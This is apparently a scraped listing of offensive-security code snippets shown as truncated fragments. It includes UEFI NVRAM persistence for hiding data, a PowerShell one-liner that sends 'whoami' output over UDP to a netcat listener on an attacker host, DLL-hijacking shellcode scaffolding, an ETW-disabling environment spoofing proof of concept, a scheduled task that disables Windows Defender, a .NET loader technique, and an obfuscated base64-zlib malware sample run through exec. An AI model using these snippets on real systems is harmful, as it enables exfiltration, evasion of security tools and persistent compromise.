Persist data in UEFI NVRAM variables.
- Stealthy way to store secrets and other data in UEFI.
- Will survive a reimaging of the operating system.
import os | |
import subprocess | |
# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
svcinfo = {} | |
FNULL = open(os.devnull, 'w') | |
win10builtin = ['AppVClient', 'ClickToRunSvc', 'COMSysApp', 'diagnosticshub.standardcollector.service', | |
'msiserver', 'ose', 'perceptionsimulation', 'SecurityHealthService', 'Sense', | |
'SensorDataService', 'SgrmBroker', 'Spooler', 'ssh-agent', 'TieringEngineService', |
# On your host: | |
# $ nc -lnvup 53 | |
# Replace <HOSTIP> with ip of the listening machine | |
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));" | |
// Dll Hijacking via Thread Creation | |
// Author - Vivek Ramachandran | |
// Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com | |
// Free Infosec Videos -- http://SecurityTube.net | |
#include <windows.h> | |
#define SHELLCODELEN 2048 |
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
// | |
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
// and then resuming the process. | |
// | |
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
#define INJECT_PARAM_LEN 43 |
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
# Modified to include support for CommandLine, File Hashes, File Paths, Signing Certificates | |
# Copyright (c) 2020 Jai Minton. All rights reserved. | |
# Copyright (c) 2014 Atif Aziz. All rights reserved. | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 | |
# |
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
## uploaded by @JohnLaTwC | |
## sample hash: b06fa24126eb1d6ed670fea4ea4252e4a8f4a460a2c3c7727d82eb1216fc4937 | |
import zlib, base64 | |
exec(zlib.decompress(base64.b64decode('eJzs3fuT5Xd95/ff9Vd0DbU1UiyL7j6X7iOXqsJabIWyYQksu9nYW67RTCN6PepRpmfAxOUqgQChlQyDkHUBLGZ0GdBldAex3PxvOLB2ycUGY2Crz5+QM7qgsCZU8kPmPM/3PFKpxOYihO3Ha8S3P+957t9x55mz5zbO7v1v5/cOzx3eeG7/jr0bD8/fdufZMyf3Dg9vPPzk4Y1nDq+bX7j4yPzC00/On/jB38yfeuGl+YXLl+YPf+fe+YXn7ppfePn5+Te/8NT80uUH/+7F+WNPfGZ+8bUvzC+8+JX5c9/5xvzil7/8kwsPzy+9dt/Ra3fPH//ep+fPv/CZ+YVn7p5f+Oar8wuffvkn3/ra/MKlL/34hcUf7NH5Y9+9d/70F5/5P7/17NErX51fePChf3r2nvljT352/vhX/2r+yN3f/y8X50994+vzC99/8OjKd35+9wvziw/eO3/2ycvzbz68+PsfeWrxj33i75+YP3fPQ/NHvvbln7/y1b99cf7wQ5+fP3bptfmVR742v3jp7qPvvji//K3X/ttnfjB/5K5L8yce/Zv/8o0fPT2/cOW++WPfuf/ohR/Mn/z0Dxf/Dr/+o2/Pn/zB1+ZPPffD+dPPvfr6M/f84oc/mF948pXFn/0Di3+de+dX/vLBX9z19Pzi5a/84q5v/OyRR39+92fmD3/v8uLvu7T4Q31r/sRn7/vpF58/euWef3rupb/77vyxp+7+0Vfml569e/7Y49/7r5975Oj5h+YX/vqv/u7Rn33nO0evXpk/ffnC/MIrX58/98A98yf+6sr8m99+7Kffvfz3n/pv9z4yf/Lxexf/rJfmT375Uz978cn5Ny4/sPif8 |